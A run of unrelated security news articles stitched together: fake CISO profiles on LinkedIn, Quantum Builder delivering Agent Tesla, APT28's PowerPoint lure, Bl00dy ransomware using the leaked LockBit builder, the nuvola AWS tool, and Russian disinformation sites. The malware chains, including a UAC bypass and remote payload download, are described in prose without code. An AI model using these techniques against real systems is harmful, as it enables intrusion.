Someone has recently created a large number of fake LinkedIn profiles for Chief Information Security Officer (CISO) roles at some of the world’s largest corporations. It’s not clear who’s behind this network of fake CISOs or what their intentions may be. But the fabricated LinkedIn identities are confusing search engine results for CISO roles at major companies, and they are being indexed as gospel by various downstream data-scraping sources.
If one searches LinkedIn for the CISO of the energy giant Chevron, one might find the profile for a Victor Sites, who says he’s from Westerville, Ohio and is a graduate of Texas A&M University.
The LinkedIn profile for Victor Sites, who is most certainly NOT the CISO of Chevron.
Of course, Sites is not the real CISO of Chevron. That role is currently occupied by Christopher Lukas of Danville, Calif. If you were confused at this point, you might ask Google who it thinks is the current Chief Information Security Officer of Chevron. When KrebsOnSecurity did that earlier this morning, the fake CISO profile was the very first search result returned (followed by the LinkedIn profile for the real Chevron CISO).
Helpfully, LinkedIn seems to be able to detect something in common about all these fake CISO profiles, because it suggested I view a number of them in the “People Also Viewed” column seen in the image above. There are two fake CISO profiles suggested there, including one for a Maryann Robles, who claims to be the CISO of another energy giant — ExxonMobil.
Maryann’s profile says she’s from Tupelo, Miss., and includes this detail about how she became a self-described “old-school geek.”
“Since playing Tradewars on my Tandy 1000 with a 300 baud modem in the early ’90s, I’ve had a lifelong passion for technology, which I’ve carried with me as Deputy CISO of the world’s largest health plan,” her profile reads.
However, this description appears to have been lifted from the profile for the real CISO at the Centers for Medicare & Medicaid Services in Baltimore, Md.
Interestingly, Maryann’s LinkedIn profile was accepted as truth by Cybercrime Magazine’s CISO 500 listing, which claims to maintain a list of the current CISOs at America’s largest companies:
The fake CISO for ExxOnMobil was indexed in Cybercrime Magazine’s CISO 500.
Rich Mason, the former CISO at Fortune 500 firm Honeywell, began warning his colleagues on LinkedIn about the phony profiles earlier this week.
“It’s interesting the downstream sources that repeat LinkedIn bogus content as truth,” Mason said. “This is dangerous, Apollo.io, Signalhire, and Cybersecurity Ventures.”
Google wasn’t fooled by the phony LinkedIn profile for Jennie Biller, who claims to be CISO at biotechnology giant Biogen (the real Biogen CISO is Russell Koste). But Biller’s profile is worth mentioning because it shows how some of these phony profiles appear to be quite hastily assembled. Case in point: Biller’s name and profile photo suggest she is female, however the “About” description of her accomplishments uses male pronouns. Also, it might help that Jennie only has 18 connections on LinkedIn.
Again, we don’t know much about who or what is behind these profiles, but in August the security firm Mandiant (recently acquired by Google) told Bloomberg that hackers working for the North Korean government have been copying resumes and profiles from leading job listing platforms LinkedIn and Indeed, as part of an elaborate scheme to land jobs at cryptocurrency firms.
None of the profiles listed here responded to requests for comment (or to become a connection).
In a statement provided to KrebsOnSecurity, LinkedIn said its teams were actively working to take these fake accounts down.
“We do have strong human and automated systems in place, and we’re continually improving, as fake account activity becomes more sophisticated,” the statement reads. “In our transparency report we share how our teams plus automated systems are stopping the vast majority of fraudulent activity we detect in our community – around 96% of fake accounts and around 99.1% of spam and scam.”
LinkedIn could take one simple step that would make it far easier for people to make informed decisions about whether to trust a given profile: Add a “created on” date for every profile. Twitter does this, and it’s enormously helpful for filtering out a great deal of noise and unwanted communications.
The former CISO Mason said LinkedIn also could experiment with offering something akin to Twitter’s verified mark to users who chose to validate that they can respond to email at the domain associated with their stated current employer.
“If I saw that a LinkedIn profile had been domain-validated, then my confidence in that profile would go way up,” Mason said, noting that many of the fake profiles had hundreds of followers, including dozens of real CISOs. Maryann’s profile grew by a hundred connections in just the past few days, he said.
“If we have CISOs that are falling for this, what hopes do the masses have?” Mason said.
Mason said LinkedIn also needs a more streamlined process for allowing employers to remove phony employee accounts. He recently tried to get a phony profile removed from LinkedIn for someone who falsely claimed to have worked for his company.
“I shot a note to LinkedIn and said please remove this, and they said, well, we have to contact that person and arbitrate this,” he said. “They gave the guy two weeks and he didn’t respond, so they took it down. But that doesn’t scale, and there needs to be a mechanism where an employer can contact LinkedIn and have these fake profiles taken down in less than two weeks.”
The recently discovered malware builder Quantum Builder is being used by threat actors to deliver the Agent Tesla RAT.
A recently discovered malware builder called Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT), Zscaler ThreatLabz researchers warn.
“Quantum Builder (aka “Quantum Lnk Builder”) is used to create malicious shortcut files. It has been linked to the Lazarus Group APT due to shared TTPs and source code overlaps, but we cannot confidently attribute this campaign to any specific threat actor.” reads the report published by Zscaler. “In this campaign, threat actor use Quantum Builder to generate malicious LNK, HTA, and PowerShell payloads which then deliver Agent Tesla on the targeted machines.”
The Quantum Builder (aka “Quantum Lnk Builder”) allows to create malicious shortcut files, it is sold on the dark web. The Quantum Builder also allows to generate malicious HTA, ISO, and PowerShell payloads that are used to drop the next-stage malware.
In the campaign observed by the experts, threat actors used the builder to generate malicious LNK, HTA, and PowerShell payloads which is used to deliver Agent Tesla on the targeted machines.
Experts noticed that this campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to past attacks.
The attack chain observed by ZScaler starts with a spear phishing email which consists of a LNK File bundled as a GZIP Archive. The messages are masqueraded as order confirmation message from a Chinese supplier of lump and rock sugar, with the LNK file concealed as a PDF document.
Upon execution of the LNK File, the embedded PowerShell code spawns MSHTA which then executes an HTA File that is hosted on a remote server.
The HTA File then decrypts a PowerShell loader script which decrypts and loads another PowerShell script after performing AES Decryption and GZIP Decompression. The decrypted PowerShell script is the Downloader PS Script, which downloads and executes the Agent Tesla binary from a remote server. The malware is executed with administrative privileges by performing a UAC Bypass using the CMSTP.
Below are the Key Features of this attack:
- The threat actors are evolving their tactics by incorporating new infection chains for delivering Agent Tesla on target machines by leveraging the LNK and HTA payloads generated by a builder dubbed “Quantum Builder”
- The Quantum Builder is a builder sold in the cybercrime marketplace and is capable of generating LNK, HTA, and ISO payloads consisting of sophisticated techniques to download and execute the final payload with a Multi-Staged attack Chain.
- The In-memory PowerShell scripts decrypted by Quantum Builder-generated HTA file perform User Account Control (UAC) Bypass via CMSTP in order to execute the final payload (Agent Tesla) with Administrative rights. UAC Bypass is also used to perform Windows Defender exclusions on the endpoint system.
- Utilizes Living Off the Land Binaries (LOLBins) to evade detections and camouflage the malicious activity.
- Incorporates techniques like Decoys, UAC Prompts and In-memory PowerShell to execute the final payload. These Techniques are regularly updated by the Developers of the Quantum Builder.
In a second variant of the infection sequence, the GZIP archive is replaced by a ZIP file, while also adopting further obfuscation strategies to camouflage the malicious activity.
Quantum Builder has witnessed a surge in usage in recent months, with threat actors using it to distribute a variety of malware, such as RedLine Stealer, IcedID, GuLoader, RemcosRAT, and AsyncRAT.
“Threat actors are continuously evolving their tactics and making use of malware builders sold on the cybercrime marketplace. This Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to create malicious payloads in campaigns against various organizations.” concludes the report. “It incorporates sophisticated techniques to evade detections, and the techniques are updated regularly by the developers. “
(SecurityAffairs – hacking, Agent Tesla)
The post Threat actors use Quantum Builder to deliver Agent Tesla malware appeared first on Security Affairs.
ONLINE DISINFORMATION is one of the defining issues of our time and the influence of fake news has become an acute threat to our society.
Disinformation undermines true journalism and steers the public opinion in highly charged topics such as immigration, climate change, armed conflicts or refugee and health crises. Social media platforms are the battlefield of disinformation.
The war in Ukraine is no exception. This investigation presents how a large disinformation campaign targeting European audience with pro-Russian propaganda was active in social media for months. What started as an investigation of media clones of the German Der Spiegel, Bild and T-Online turned out to be a fascinating dive into the multimedia world of disinformation production.
Tracing the infrastructure of a few websites helped us to discover dozens of websites spreading Russian propaganda related to the war in Ukraine. The campaign undermined the Ukrainian government, its citizens, and Western governments supporting Ukraine and supported the lift of sanctions against Russia.
Qurium’s infrastructure research does not only show how European infrastructure has been used to host the fake news sites, but also how new domains have been registered to keep the campaign running in the very same physical servers.
Qurium’s investigation is the result of a collaboration with EU DisinfoLab, an independent non-profit organization focused on tackling sophisticated disinformation campaigns targeting the EU. Qurium has focused on the technical aspects of the campaign.
Qurium forensics report:
Under the hood of a Doppelgänger
EU DisinfoLab report:
(SecurityAffairs – hacking, Disinformation)
The post ONLINE DISINFORMATION: Under the hood of a Doppelgänger appeared first on Security Affairs.
The Russia-linked APT28 group is using mouse movement in decoy Microsoft PowerPoint documents to distribute malware.
The Russia-linked APT28 employed a technique relying on mouse movement in decoy Microsoft PowerPoint documents to deploy malware, researchers from Cluster25 reported.
Cluster25 researchers were analyzing a lure PowerPoint document used to deliver a variant of Graphite malware, which is known to be used exclusively by the APT28 group, that starts the attack chain when the user starts the presentation mode and moves the mouse.
The user action starts the execution of a PowerShell script designed to download and run a dropper from OneDrive.
“The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive. The latter downloads a payload that extracts and injects in itself a new PE (Portable Executable) file, that the analysis showed to be a variant of a malware family known as Graphite, that uses the Microsoft Graph API and OneDrive for C&C communications.” reads the analysis published by Cluster25.
The lure document used a template potentially linked to The Organisation for Economic Co-operation and Development (OECD), it contains two slides, written in English and French respectively, with the same content.
The dropper appears as a file with a JPEG extension (DSC0002.jpeg), it is a DLL file that is later decrypted and written to C:\ProgramData\lmapi2.dll.
The last stage malware is a version of Graphite, it communicates with the C2 servers through the domain graph[.]Microsoft[.]com, (i.e. abusing the Microsoft Graph service) and OneDrive.
The Graphite is a fileless malware that is deployed in-memory only and is used by threat actors to deliver post-exploitation frameworks like Empire.
The analysis of metadata revealed that the nation-state actors employed them in a campaign between January and February 2022. However, the researchers noticed that URLs used in the attacks appeared still active in August and September, a circumstance that suggests the campaign is still ongoing.
Potential targets of the campaign are organizations and individuals operating in the defense and government sectors of countries in Europe and Eastern Europe.
“Such recent evidence could suggest some sort of activities still ongoing linked to the described threat or to some of its variants. Finally, based on several indicators, geopolitical objectives and the analyzed artifacts, Cluster25 attributes this campaign to the Russia-linked threat actor known as APT28 (aka Fancy Bear, TSAR Team, Pawn Storm, Sednit) and indicates entities and individuals operating in the defense and government sectors of Europe and Eastern Europe countries as potential targets.” concludes the report.
(SecurityAffairs – hacking, APT)
The post APT28 relies on PowerPoint Mouseover to deliver Graphite malware appeared first on Security Affairs.
- The Hacker News
- Cyber Criminals Using Quantum Builder Sold on Dark Web to Deliver Agent Tesla Malware
The recently born Bl00Dy Ransomware gang has started using the recently leaked LockBit ransomware builder in attacks in the wild.
The Bl00Dy Ransomware gang is the first group that started using the recently leaked LockBit ransomware builder in attacks in the wild.
Last week, an alleged disgruntled developer leaked the builder for the latest encryptor of the LockBit ransomware gang.
The latest version of the encryptor, version 3.0, was released by the gang in June. According to the gang, LockBit 3.0 has important novelties such as a bug bounty program, Zcash payment, and new extortion tactics. The gang has been active since at least 2019 and today it is one of the most active ransomware gangs.
The code of the encryptor was leaked on Twitter by at least a couple of accounts, @ali_qushji and @protonleaks1.
The builder is contained in a password-protected 7z archive, “LockBit3Builder.7z,” containing:
The availability of the builder could allow any threat actor to create its own version of the ransomware customizing it by modifying the configuration file.
Now BleepingComputer first reported that the Bl00Dy Ransomware group started using the Lockbit 3.0 builder to create its own ransomware.
Early this week, the researcher Vladislav Radetskiy reported the discovery of a new Bl00Dy Ransomware Gang encryptor that was employed in an attack on a Ukrainian organization. The researchers did not immediately identify the ransomware involved in the attack, it appeared as Conti or LockBit.
MalwareHunterTeam researchers confirmed that the encryptor used in the attack by the Bl00Dy Ransomware group was built using the leaked LockBit 3.0 builder.
BleepingComputer researchers, who tested the Bl00dy Ransomware Gang’s encrypter, confirmed that it was generated with the leaked LockBit 3.0. builder.
(SecurityAffairs – hacking, Bl00Dy Ransomware)
The post Bl00dy ransomware gang started using leaked LockBit 3.0 builder in attacks appeared first on Security Affairs.
nuvola is the new open-source cloud security tool to address the privilege escalation in cloud environments.
nuvola is the new open source security tool made by the Italian cyber security researcher Edoardo Rosa (@_notdodo_), Security Engineer at Prima Assicurazioni. The tool was released during the RomHack 2022 security conference in Rome. The tool helps the security community to address the complex topic of privilege escalation on cloud environments such as AWS.
Privilege escalation is one common practice used by bad actors to gain entry into your most sensitive systems. They may start with a low-level account, but they exploit permissions and pathways to work themselves up to an intimidating level of privilege where they’re poised to cause irreparable damage and also gain persistence or lockdown the account.
Forrester estimated that 80% of security breaches involve privileged credentials. Many organizations have adopted cloud with such enthusiasm that they’ve failed to cover the fundamentals in security leaving many gaps for bad actors to find their way in.
Just like other forms of attacks, privilege escalation can go unnoticed, especially in a complex cloud environment where companies already have difficulty gaining visibility into their internal users, identities, and actions. A bad actor could spend days, if not weeks, inside your systems and you may not even know it. They could even expose sensitive data and, like in 50% of cases, you might be completely unaware of the breach until a third party informs you of it.
When it comes to AWS security, Identity and Access Management (IAM) permission misconfigurations have long held a spotlight, but that doesn’t mean they’re any easier to avoid. In reality, preventing privilege escalation begins with making it as difficult as possible applying the principle of least privilege.
Still, with common configuration issues and other vulnerabilities becoming commonplace in AWS architecture, it’s important to understand how bad actors could exploit our environments by understanding the most common AWS privilege escalations used.
Cloud Security Context
Cloud is a continuously evolving space with new services, strategies, and technologies springing up seemingly overnight. Due to this, organizations regularly change and adapt their approach to cloud and cloud security.
A report from the Cloud Security Alliance (Technology and Cloud Security Maturity, 2022) states that 84% of organizations report having no automation; since Identity and Access Management is a key factor in securing companies, automating the detection of possible attack paths may reduce the attack surface and avoid potential data breaches.
Beyond the technological aspects, another compendium of Cloud Security Alliance (The State of Cloud Security Risk, Compliance, and Misconfigurations, 2022) states that the lack of knowledge and expertise are well-known issues within the information security industry.
It is no surprise then, that lack of knowledge and expertise was consistently identified as:
- the primary barrier to general cloud security (59%)
- the primary cause of misconfigurations (62%)
- a barrier to proactively preventing or fixing misconfigurations (59%)
- the primary barrier to implementing auto-remediation (56%)
Also, from the same report, the primary reason organizations state for having a security incident due to misconfigurations is lack of visibility (68%).
A global overview is vital for both an attacker and a defender because it allows both security analysts and attackers to immediately find attack paths to remediate or abuse the system.
A full understanding of the environment from a high-level enables companies to establish priorities and fulfill security requirements.
While IAM security is security is very important an attacker may also abuse misconfigurations on the environment like exposed resources (Alteryx, Twilio) or services; a Cloud Security Posture Management (CSPM) can help companies securing their asset defining standard controls (CIS, PCI, NIST, SOC2) and custom ruleset to avoid false positives or increase detection of security issues.
While some tools that support AWS are very useful and greatly developed, many of them lack a global overview or features and the results must be manually reviewed, aggregated and ingested in other tools or custom scripts.
nuvola (with the lowercase n) is a tool to dump and perform automatic and manual security analysis on AWS environments configurations and services using predefined, extensible and custom rules created using graphs and a simple Yaml syntax.
The general idea behind this project is to create an abstracted digital twin of a cloud platform. For a more concrete example: nuvola reflects the BloodHound traits used for Active Directory analysis but on cloud environments.
The usage of a graph database also increases the possibility of finding different and innovative attack paths and can be used as an offline, centralized and lightweight digital twin.
Like BloodHound, nuvola uses the advantages and principles of the graph theory (implemented in the Neo4j graph database) to discover, and reveal relationships between objects within a cloud ecosystem enabling the engineers to perform analysis.
Since Prima Assicurazioni believes in open source, the tool it’s created with a community mindset and without custom or specific constraints to help us and other companies secure the AWS ecosystems. The tool also supports the creation of detection rules using YAML files to help experts and non-experts to contribute to the project.
For example using nuvola we can define a Yaml file to find all EC2 instances with the metadata endpoint not upgraded to v2. The syntax is easier that the one offered by Cypher, the query engine for Neo4j, allowing even non-hardcore analyst to perform assessments.
Figure. Output of a query to find vulnerable EC2 instances
The main advantage of using graphs is that we are able to find paths: from A to B.
We can find at vulnerable path using a Yaml file to query all paths from all users or roles to a target; in this case the policy called AdministratorAccess; abusing the actions PassRole and CreateStack.
Figure. List of AWS roles which can perform privilege escalation to administrator
The output shown in the above image states that cloudformation-deployer role can reach the policy AdministratorAccess; as well as the role temp-backend-api-role-runner.
About the author: Luca Mella, Cyber Security Expert, Response & Threat Intel | Manager
In 2019, Luca was mentioned as one of the “32 Influential Malware Research Professionals”. He is a former member of the ANeSeC CTF team, one of the firsts Italian cyber war-game teams born back in 2011.
(SecurityAffairs – hacking, cloud computing)
Meta dismantled a network of Facebook and Instagram accounts spreading disinformation across European countries.
Meta announced to have taken down a huge Russian network of Facebook and Instagram accounts used to spread disinformation published on more than 60 websites impersonating news organizations across Europe. The disinformation operation began in May 2022, the network targeted primarily Germany, France, Italy, Ukraine and the UK, it was spreading fake content related to the war in Ukraine and its impact in Europe. Meta pointed out that this is the largest and most complex Russian operation they’ve disrupted since the war in Ukraine began.
The shared articles criticized Ukraine and Ukrainian refugees, applauded Russia, and argued that Western sanctions on Russia would backfire.
“We took down a large network that originated in Russia and targeted primarily Germany, and also France, Italy, Ukraine and the United Kingdom. The operation began in May of this year and centered around a sprawling network of over 60 websites carefully impersonating legitimate news organizations in Europe, including Spiegel, The Guardian, Bild and ANSA.” reads the report published by Meta.
“There, they would post original articles that criticized Ukraine and Ukrainian refugees, supported Russia and argued that Western sanctions on Russia would backfire.”
Below is a list of domains used to impersonate legitimate news organizations:
- Avisindependent[.]eu 6/3/2022 France
- bild[.]pics 6/6/2022 Germany
- rrn[.]world 6/6/2022 Multiple
- dailymail[.]top 6/10/2022 UK
- repubblica[.]life 6/13/2022 Italy
- delfi[.]life 6/15/2022 Latvia
- dailymail[.]cam 6/23/2022 UK
- dailymail[.]cfd 6/23/2022 UK
- 20minuts[.]com 6/28/2022 France
- ansa[.]ltd 6/28/2022 Italy
- spiegel[.]ltd 6/29/2022 Germany
- theguardian[.]co[.]com 7/7/2022 UK
Threat actors behind this operation promoted the articles and also original memes and YouTube videos across many internet services, including Facebook, Instagram, Telegram, Twitter, petitions websites Change.org and Avaaz, and even LiveJournal.
“The amplification on social media, on the other hand, relied primarily on crude ads and fake accounts. In fact, on our platforms, the majority of the accounts, Pages and ads were detected and removed by our automated systems before we even began our investigation.” continues the report. “Together, these two approaches worked as an attempted smash-and-grab against the information environment, rather than a serious effort to occupy it long-term.”
Meta shared some numbers related to this campaign:
- Presence on Facebook and Instagram: 1,633 accounts, 703 Pages, one Group and 29 accounts on Instagram.
- Followers: About 4,000 accounts followed one or more of these Pages, less than 10 accounts joined this Group and about 1,500 accounts followed one or more of these Instagram accounts.
- Advertising: Around $105,000 in spending for ads on Facebook and Instagram, paid for primarily in US dollars and euros.
Meta also disrupted for the first time a Chinese network focused on U.S. domestic politics. The Chinese-origin influence operation also targeted the Czech Republic. It ran across Facebook, Instagram, Twitter, and also two petition platforms in Czechia.
(SecurityAffairs – hacking, disinformation)
The post Meta dismantled the largest Russian network since the war in Ukraine began appeared first on Security Affairs.